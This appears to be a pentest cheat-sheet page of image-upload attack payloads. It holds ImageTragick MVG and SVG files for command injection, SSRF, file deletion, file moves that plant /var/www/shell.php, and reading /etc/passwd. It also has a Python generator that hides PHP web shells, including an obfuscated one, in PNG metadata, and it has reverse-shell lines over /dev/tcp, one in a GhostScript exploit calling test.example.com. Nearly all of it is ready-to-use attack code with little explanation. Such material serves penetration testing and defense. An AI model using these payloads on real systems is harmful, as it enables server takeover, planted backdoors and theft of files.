Skip to content

Images

Image Uploads

ImageTragic Files

ImageTragic Shell Execution (exploit.mvg):

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

ImageTragic Shell Execution (exploit.svg):

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
"http://www.w3.org/1999/xlink";>
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

ImageTragic Reverse Shell Execution (exploit.mvg):

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

ImageTragic SSRF (ssrf.mvg):

push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

ImageTragic File Deletion (delete_file.mvg):

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
pop graphic-context

ImageTragic File Move (file_move.mvg):

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
pop graphic-context

ImageTragic File Move (file_move.svg):

<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

ImageTragic File Read (file_read.mvg):

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

Image LFI

PNG Generator:

from PIL import Image

# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls

#shellcode  = "<?=@`$_GET[c]`;"
shellcode = "<?php system($_GET['c']); ?>"
# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"


print("\n[+] Advanced Upload - Shell inside metadatas of a PNG file")

# Create a backdoored PNG
print(" - Creating a payload.png")
im = Image.new("RGB", (10,10), "Black")
im.info["shell"] = shellcode
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')

# undocumented class
from PIL import PngImagePlugin
meta = PngImagePlugin.PngInfo()

# copy metadata into new object
for k,v in im.info.items():
	if k in reserved: continue
	meta.add_text(k, v, 0)
im.save("payload.png", "PNG", pnginfo=meta)

print("Done")

GhostScript Exploit:

%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/test.example.com/80 0>&1') currentdevice putdeviceprops